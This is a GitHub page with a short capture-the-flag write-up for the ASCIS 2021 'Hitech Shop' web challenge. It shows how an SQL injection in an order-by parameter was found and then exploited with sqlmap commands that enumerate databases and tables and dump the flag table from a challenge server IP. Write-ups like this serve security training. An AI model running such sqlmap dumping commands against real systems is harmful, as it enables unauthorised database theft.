Skip to content

D4rkP0w4r/ASCIS-2021---Warm-up

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
README.md
README.md
 
 
challenge.PNG
challenge.PNG
 
 
request.PNG
request.PNG
 
 
sqli.PNG
sqli.PNG
 
 
sqlmap0.PNG
sqlmap0.PNG
 
 
sqlmap1.PNG
sqlmap1.PNG
 
 
sqlmap2.PNG
sqlmap2.PNG
 
 

Repository files navigation

ASCIS-2021 Warm-up - 100pts

  • Category: Web
  • Name: Hitech Shop
  • Level: None
  • Description: None

Solution

  • Overview the challenge provided us a search box i think it Sql Injection Main function
  • I try double quote and this is server response Main function
  • Run this command in sqlmap sqlmap -u http://125.235.240.166:20105/index?order=price --time-sec=200 --user-agent=* --dbs --level 5
  • I found two databases, but i only attention vannd Main function
  • Then i used command sqlmap -u http://125.235.240.166:20105/index?order=price --tables -D vannd for scan vannd table
  • Finally i found a table contain flag =)))) Main function
  • Later i scan flag table used this command sqlmap -u http://125.235.240.166:20105/index?order=price --columns -D vannd -T flag --dump Main function
  • FLAG ASCIS{SQL_1nJecTi0n_Ba5e_0N_OrdeR_bY}

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published